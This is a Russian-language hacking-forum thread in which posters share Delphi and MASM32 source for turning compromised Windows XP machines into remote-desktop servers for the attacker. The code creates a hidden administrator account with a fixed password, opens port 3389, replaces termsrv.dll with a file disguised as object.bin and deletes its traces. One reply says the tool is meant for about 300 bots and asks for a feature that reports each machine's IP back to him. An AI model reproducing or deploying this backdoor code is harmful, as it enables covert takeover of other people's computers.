ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.03.2010, 18:48
|
|
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
Провел на форуме:
709575
Репутация:
17
|
|
Я rdp открываю так:
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
del on_rdp.bat
|
|
|
08.03.2010, 01:35
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
итак, готово.
"На дельфи" программа, более менее эффективно превращающая ПК в Dedicated Server с учетной записью test_account и паролем some_password выглядит так:
Код:
program Dedic;
uses
SysUtils,windows;
var
f:textfile;
begin
copyfile('object.bin','c:\RECYCLER\temp_dll.tmp',false);
assignfile(f,'c:\RECYCLER\temp1.bat');
rewrite(f);
writeln(f,'net user test_account some_password /add');
writeln(f,'net user test_account some_password /EXPIRES:NEVER');
writeln(f,'net user test_account /active:yes');
writeln(f,'net localgroup Users test_account /add');
writeln(f,'net localgroup Power Users test_account /add');
writeln(f,'net localgroup Power Backup Operators test_account /add');
writeln(f,'net localgroup Power Remote Desktop Users test_account /add');
writeln(f,'net localgroup Administrators test_account /add');
writeln(f,'chcp 1252');
writeln(f,'net localgroup Администраторы test_account /add');
writeln(f,'chcp 866');
writeln(f,'net localgroup HelpServicesGroup test_account /add');
writeln(f,'md "%SystemDrive%\Documents and Settings\test_account"');
writeln(f,'attrib +r +a +s +h "%SystemDrive%\Documents and Settings\test_account"');
writeln(f,'');
writeln(f,'');
writeln(f,'echo Windows Registry Editor Version 5.00>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>file.reg');
writeln(f,'echo "Start"=dword:00000002>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services]>>file.reg');
writeln(f,'echo "MaxInstanceCount"=dword:00000064>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]>>file.reg');
writeln(f,'echo "EnableConcurrentSessions"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>file.reg');
writeln(f,'echo "AllowMultipleTSSessions"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History]>>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]>>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]>>file.reg');
writeln(f,'echo "Options"=dword:00000000>>file.reg');
writeln(f,'echo "Version"=dword:00010001>>file.reg');
writeln(f,'echo "DSPath"="LocalGPO">>file.reg');
writeln(f,'echo "FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine">>file.reg');
writeln(f,'echo "DisplayName"="Политика локальной группы">>file.reg');
writeln(f,'echo "Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]">>file.reg');
writeln(f,'echo "Link"="Local">>file.reg');
writeln(f,'echo "GPOName"="Политика локальной группы">>file.reg');
writeln(f,'echo "GPOLink"=dword:00000001>>file.reg');
writeln(f,'echo "lParam"=dword:00000000>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]>>file.reg');
writeln(f,'echo "fDenyTSConnections"=dword:00000000>>file.reg');
writeln(f,'echo "fEnableSalem"=dword:00000000>>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD]>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD\0000]>>file.reg');
writeln(f,'echo "Service"="RDPWD">>file.reg');
writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
writeln(f,'echo "Class"="LegacyDriver">>file.reg');
writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
writeln(f,'echo "DeviceDesc"="RDPWD">>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD\0000\Control]>>file.reg');
writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
writeln(f,'echo "ActiveService"="RDPWD">>file.reg');
writeln(f,'');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP]>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP\0000]>>file.reg');
writeln(f,'echo "Service"="TDTCP">>file.reg');
writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
writeln(f,'echo "Class"="LegacyDriver">>file.reg');
writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
writeln(f,'echo "DeviceDesc"="TDTCP">>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP\0000\Control]>>file.reg');
writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
writeln(f,'echo "ActiveService"="TDTCP">>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RDPWD\Enum]>>file.reg');
writeln(f,'echo "0"="Root\\LEGACY_RDPWD\\0000">>file.reg');
writeln(f,'echo "Count"=dword:00000001>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TDTCP\Enum]>>file.reg');
writeln(f,'echo "0"="Root\\LEGACY_TDTCP\\0000">>file.reg');
writeln(f,'echo "Count"=dword:00000001>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>file.reg');
writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>file.reg');
writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
writeln(f,'');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>file.reg');
writeln(f,'echo "fDenyTSConnections"=dword:00000000>>file.reg');
writeln(f,'echo "fEnableSalem"=dword:00000000>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD]>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD\0000]>>file.reg');
writeln(f,'echo "Service"="RDPWD">>file.reg');
writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
writeln(f,'echo "Class"="LegacyDriver">>file.reg');
writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
writeln(f,'echo "DeviceDesc"="RDPWD">>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD\0000\Control]>>file.reg');
writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
writeln(f,'echo "ActiveService"="RDPWD">>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP]>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP\0000]>>file.reg');
writeln(f,'echo "Service"="TDTCP">>file.reg');
writeln(f,'echo "Legacy"=dword:00000001>>file.reg');
writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg');
writeln(f,'echo "Class"="LegacyDriver">>file.reg');
writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg');
writeln(f,'echo "DeviceDesc"="TDTCP">>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP\0000\Control]>>file.reg');
writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg');
writeln(f,'echo "ActiveService"="TDTCP">>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDPWD\Enum]>>file.reg');
writeln(f,'echo "0"="Root\\LEGACY_RDPWD\\0000">>file.reg');
writeln(f,'echo "Count"=dword:00000001>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TDTCP\Enum]>>file.reg');
writeln(f,'echo "0"="Root\\LEGACY_TDTCP\\0000">>file.reg');
writeln(f,'echo "Count"=dword:00000001>>file.reg');
writeln(f,'echo "NextInstance"=dword:00000001>>file.reg');
writeln(f,'');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>file.reg');
writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>file.reg');
writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg');
writeln(f,'');
writeln(f,'');
writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>file.reg');
writeln(f,'echo "test_account"=dword:00000000>>file.reg');
writeln(f,'');
writeln(f,'REGEDIT /S file.reg');
writeln(f,'DEL /Q file.reg');
writeln(f,'');
writeln(f,'ren %SystemRoot%\system32\termsrv.dll termsrv.old');
writeln(f,'del %SystemRoot%\system32\termsrv.old');
writeln(f,'copy c:\RECYCLER\temp_dll.tmp %SystemRoot%\system32\DLLCache\termsrv.dll');
writeln(f,'copy c:\RECYCLER\temp_dll.tmp %SystemRoot%\system32\termsrv.dll');
writeln(f,'');
writeln(f,'DEL /Q c:\RECYCLER\temp_dll.tmp');
writeln(f,'shutdown -r -f -t 1');
writeln(f,'DEL /Q c:\RECYCLER\temp1.bat');
closefile(f);
assignfile(f,'c:\RECYCLER\temp2.bat');
rewrite(f);
writeln(f,'set /a hr=%time:~,2%');
writeln(f,'set /a min=%TIME:~3,2%+15');
writeln(f,'at %hr%:%min% c:\RECYCLER\temp1.bat');
writeln(f,'DEL /Q c:\RECYCLER\temp2.bat');
closefile(f);
winexec('c:\RECYCLER\temp2.bat',0);
end.
где object.bin - переименованная для меньшей подозрительности старая версия библиотеки termsrv.dll, позволяющая коннектиться к ХР-юше сразу многим пользователям.
Скачать её можно в гугле или тут (http://errorneo.com/files/termsrv.zip)
Код оттестирован на виртуалке и полностью работоспособен.
Написан в образовательных целях.
post scriptum:
writeln(f,'net user test_account /active:yes'); - чтобы было. При некоторых юзернеймах может пригодиться.
writeln(f,''); - для красоты.
"На дельфи" в кавычках потому, что можно было бы и вообще обойтись без коноплируемого языка - сделав программу из одного единственного батника и либы. Но все же в виде exe оно как-то удобнее
Последний раз редактировалось ErrorNeo; 10.03.2010 в 00:21..
|
|
|
|
08.03.2010, 15:41
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827
Репутация:
48
|
|
Вот вам исходничек. Писал когдато мож пригодится.
MASM32
Код:
.586
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include shell32.inc
include netapi32.inc
include advapi32.inc
include oleaut32.inc
includelib kernel32.lib
includelib shell32.lib
includelib netapi32.lib
includelib advapi32.lib
includelib oleaut32.lib
.data
wzUser dw "r","0","0","t",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
wzPass dw "t","0","0","r",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
pwzUser dd offset wzUser
d1 dd 0
Err dd 0
Ginfo LOCALGROUP_INFO_1 <0>
Uinfo USER_INFO_1 <0>
Eread dd 0
Etotal dd 0
hKey dd 0
szTerm db "SYSTEM\CurrentControlSet\Control\Terminal Server",0
szLic db "SYSTEM\\CurrentControlSet\Control\Terminal Server\Licensing Core",0
szSacc db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList",0
szUsr db "r00t",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
szVal db "fDenyTSConnections",0
szSes db "EnableConcurrentSessions",0
szSrvc db "TermService",0
Zer dd 0
One dd 1
Scm dd 0
Srvc dd 0
Sstat SERVICE_STATUS <0>
Sconf QUERY_SERVICE_CONFIG <0>
bneed dd ?
advpack db "advpack.dll",0
IsAdmin db "IsNTAdmin",0
_IsNTAdmin dd ?
hLib dd ?
szWin db MAX_PATH dup(?)
.code
start:
;NT Root
;==========================================================================
;Проверка на привилегии
;=======================
invoke LoadLibrary,addr advpack
mov hLib,eax
invoke GetProcAddress,hLib,addr IsAdmin
mov _IsNTAdmin,eax
push 0
push 0
call _IsNTAdmin
.if eax == 0
jmp error
.endif
;================================
; Заполняем структуру пользователя
;================================
mov Uinfo.usri1_name,offset wzUser
mov Uinfo.usri1_password,offset wzPass
mov Uinfo.usri1_priv,USER_PRIV_USER
mov Uinfo.usri1_flags,UF_SCRIPT or UF_DONT_EXPIRE_PASSWD
;================================
; Удаляем добавляем пользователя
;================================
invoke NetUserDel,NULL,addr wzUser
invoke NetUserAdd,NULL,1,addr Uinfo,addr Err
cmp eax,0
jne error
;================================
; Перечисляем группы
;================================
invoke NetLocalGroupEnum,0,1,addr Ginfo,0fffffffh,addr Eread,addr Etotal,0
cmp eax,0
jne error
mov ecx,Eread
go: push ecx
mov edx,dword ptr [Ginfo]
mov edx,dword ptr [edx+ecx*8-8]
;=====================================
; Добавляем пользователя во все группы
;=====================================
invoke NetLocalGroupAddMembers,NULL,edx,3,addr pwzUser,1
pop ecx
loop go
invoke NetApiBufferFree,addr Ginfo
;============================================
; Добавляем пользователя в состав специальных
;============================================
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szSacc,0,6,addr hKey
invoke RegSetValueEx,hKey,addr szUsr,0,REG_DWORD,addr Zer,sizeof Zer
invoke RegCloseKey,hKey
;============================================
; Разрешаем терминальные подключения
;============================================
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szTerm,0,6,addr hKey
invoke RegSetValueEx,hKey,addr szVal,0,REG_DWORD,addr Zer,sizeof Zer
invoke RegCloseKey,hKey
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szLic,0,6,addr hKey
invoke RegSetValueEx,hKey,addr szSes,0,REG_DWORD,addr One,sizeof One
invoke RegCloseKey,hKey
invoke OpenSCManager,0,0,SC_MANAGER_CONNECT
mov Scm,eax
invoke OpenService,Scm,addr szSrvc,SERVICE_START or SERVICE_QUERY_STATUS or SERVICE_CHANGE_CONFIG
mov Srvc,eax
;============================================
; Запрашивем статус сервиса терминалов
;============================================
invoke QueryServiceConfig,Srvc,NULL,0,addr bneed
invoke QueryServiceConfig,Srvc,addr Sconf,bneed,addr bneed
cmp Sconf.dwStartType,SERVICE_AUTO_START
je autok
invoke ChangeServiceConfig,Srvc,-1,SERVICE_AUTO_START,-1,0,0,0,0,0,0,0
autok:
invoke QueryServiceStatus,Srvc,addr Sstat
cmp Sstat.dwCurrentState,SERVICE_RUNNING
;=============================================
; Если на запушен запускаем
;=============================================
je stnreq
invoke StartService,Srvc,0,0
stnreq:
invoke CloseServiceHandle,Scm
ok: invoke ExitProcess,0
error: invoke ExitProcess,1
end start
Последний раз редактировалось dr.Pilulkin; 08.03.2010 в 15:43..
|
|
|
|
22.03.2010, 20:54
|
|
Новичок
Регистрация: 08.01.2010
Сообщений: 16
Провел на форуме:
34744
Репутация:
0
|
|
дайте плиз уже скомпилинный ехе,и еще вопрос:
а можно как нибудь прикрутить запрос еще?например ставлю скрипт который собирает ип и если все ровно установилось с прямым ипом то он отстукивается на скрипт,вот так как нибудь можно замутить?
просто есть ботов штук 300,хотел их просто прогрузить что бы дедиков из них сделать
|
|
|
|
27.03.2010, 19:34
|
|
Новичок
Регистрация: 27.11.2008
Сообщений: 23
Провел на форуме:
73459
Репутация:
3
|
|
лучше выложите сами сорцы в архиве, потому что те которые выложены тут все покоцынные..
|
|
|
|
27.03.2010, 19:44
|
|
Участник форума
Регистрация: 29.07.2008
Сообщений: 128
Провел на форуме:
225836
Репутация:
34
|
|
Сообщение от Axeee
лучше выложите сами сорцы в архиве, потому что те которые выложены тут все покоцынные..
Ты болен братан.... Тебя при рождении самого покоцало походу...
|
|
|
|
31.03.2010, 19:34
|
|
Moderator - Level 7
Регистрация: 02.05.2009
Сообщений: 894
Провел на форуме:
4297091
Репутация:
2261
|
|
Сообщение от rebbe
дайте плиз уже скомпилинный ехе
а смысл, если любая компиляция начнется палиться ВСЕМИ антивирусами через 2 дня после того, как будет выложена? Даже несмотря на то, что в этом коде нет ничего "вредоносного".
Я тут один небольшой рабочий ехе всего 4 людям знакомым дал на тест (ради интереса), так уже через 3 дня ехе палился! Кто-то догадался прогнать вирустоталом! 
Нет. такие вещи могут распространяться только в исходных кодах и только в учебных целях.
Последний раз редактировалось ErrorNeo; 31.03.2010 в 19:38..
|
|
|
|
02.04.2010, 12:48
|
|
Новичок
Регистрация: 27.11.2008
Сообщений: 23
Провел на форуме:
73459
Репутация:
3
|
|
Сообщение от Fliplab
Ты болен братан.... Тебя при рождении самого покоцало походу...
я так понял ты тут мастер по флуду да ? ..ты можешь выложить сорцы норм или ты покоцанный флудер ?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
